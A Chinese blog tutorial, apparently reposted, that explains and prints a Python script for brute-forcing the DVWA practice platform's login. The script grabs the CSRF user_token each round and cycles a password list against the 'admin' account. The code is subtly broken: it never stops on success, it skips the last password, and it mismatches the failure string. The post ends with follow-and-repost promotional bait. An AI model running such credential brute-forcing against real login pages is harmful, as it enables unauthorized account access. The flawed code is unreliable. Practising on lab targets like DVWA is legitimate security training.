龙空技术网

python编写渗透测试工具之一——dvwa登录爆破

编程只为 165

前言:

而今咱们对“python3 多进程爆破”大致比较注意,小伙伴们都需要分析一些“python3 多进程爆破”的相关资讯。那么小编也在网络上搜集了一些有关“python3 多进程爆破””的相关知识,希望咱们能喜欢,小伙伴们一起来了解一下吧!

dvwa是一个开源的由php语言编写、使用mysql数据库的漏洞利用平台,平台涵盖web应用常见的安全漏洞,如命令执行、文件包含、SQL注入、XSS、CSRF等安全漏洞,供安全研究人员和白帽子进行web安全的学习和演练。

本文主要内容是使用python编写dvwa登录的暴力破解脚本。dvwa的本地搭建这里就不赘述了,网上有很多介绍的文章大家可自行度娘,本次环境使用的是docker技术在kali linux虚拟机上进行的搭建。

我准备了高价值Python学习教程,免费赠送!领取方式:帮忙转发,关注,私信小编“01”获取!

一、爆破原理

爆破的原理很简单,就是对用户名和密码进行不断尝试,直至成功。一般在渗透过程中会配置相应的字典,以提高爆破成功的效率。好了,这里不多说,我们打开dvwa的登录界面,输入正确的用户名admin和错误的密码123(正确的密码是password),查看登录结果。

从登录结果明显可以看到"Login Failed"字样,既登录失败。这里值得关注的是,查看发送的数据包,提交的post数据中有user_token,且每次刷新页面的时候user_token都会有变化,这会不会是防止burpsuite类工具爆破的一种机制呢。经查,服务器在每次登录失败或刷新页面时都会返回一个hidden域,内容就是这个csrf_token。并且会在每次发送登录请求时,提交这个数据。

现在有一个猜想,如果我登录提供正确的用户名admin和正确的密码password,但不提交这个user_token,会怎么样呢?服务器会拒绝吗?结果如图3所示,服务器返回结果是"CSRF token is incorrect"。可见,我们要达到爆破的目的,必须在提交参数时包含上次服务器返回给我们的csrf_token。

二、代码编写

引入相应的包,因为csrf_token在服务器端校验。为了保证会话的连续性,应保证Session的一致。

import requestsfrom bs4 import BeautifulSoups = requests.Session()csrf_token=''

2.识别页面的csrf_token,本文采用的方法是使用BeastifuSoup解析页面,提取hidden标签内csrf_token的value,

#第一步,获取网页的csrf_token url='' heads = {} heads[ 'User-Agent'] = 'Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19' req = s.get(url) req.encoding = 'UTF-8' html = req.text soup_texts = BeautifulSoup(html,'lxml') #print(soup_texts) csrf_token=soup_texts.find('input', {'name': 'user_token'}).get('value')

3.开始登录页面的爆破,携带页面的csrf_token、读取字典内的密码,发送登录请求。如果登录失败则页面会返回“Login Failed”,识别失败页面的csrf_token、更换密码并继续发送请求,直至所有字典遍历完毕或登录成功。这里为了演示方便我设置了一个小字典,存放在列表中password=['abc','123','abcd','password','ssccc']。大家在实战中,完全可以从txt文件中读取密码。

#设置密码字典password password=['abc','123','abcd','password','ssccc'] lenth=len(password) count=0 flag=True while(flag and count<lenth-1): data = {'username': 'admin', 'password':password[count], 'Login': 'Login', 'user_token': csrf_token} req = s.post(url=url, headers=heads, data=data) req.encoding = 'UTF-8' html = req.text if 'Login failed' in html: soup_texts = BeautifulSoup(html, 'lxml') csrf_token = soup_texts.find('input', {'name': 'user_token'}).get('value') print("用户名:admin,密码:{}登录失败".format(password[count])) count+=1 else: flag = True print("用户名:admin,密码:{}登录成功".format(password[count])) count+=1

4.爆破效果

三、完整代码

import requestsfrom bs4 import BeautifulSoups = requests.Session()csrf_token=''def main(): #第一步,获取网页的csrf_token url='' heads = {} heads[ 'User-Agent'] = 'Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19' req = s.get(url) req.encoding = 'UTF-8' html = req.text soup_texts = BeautifulSoup(html,'lxml') #print(soup_texts) csrf_token=soup_texts.find('input', {'name': 'user_token'}).get('value') #设置密码字典password password=['abc','123','abcd','password','ssccc'] lenth=len(password) count=0 flag=True while(flag and count<lenth-1): data = {'username': 'admin', 'password':password[count], 'Login': 'Login', 'user_token': csrf_token} req = s.post(url=url, headers=heads, data=data) req.encoding = 'UTF-8' html = req.text if 'Login failed' in html: soup_texts = BeautifulSoup(html, 'lxml') csrf_token = soup_texts.find('input', {'name': 'user_token'}).get('value') print("用户名:admin,密码:{}登录失败".format(password[count])) count+=1 else: flag = True print("用户名:admin,密码:{}登录成功".format(password[count])) count+=1main()

我自己是一名从事了多年的Python老程序员,辞职目前在做自己的Python私人定制课程,今年整理了一份最适合2019年学习的Python学习干货,免费赠送给每一位小伙伴

如果你也想当一位程序员,学习Python,那么帮忙转发一下然后再关注小编后私信“01”可以得到我整理的这些Python资料了(私信方法:点击我头像进我主页有个上面有个私信按钮)。

标签: #python3 多进程爆破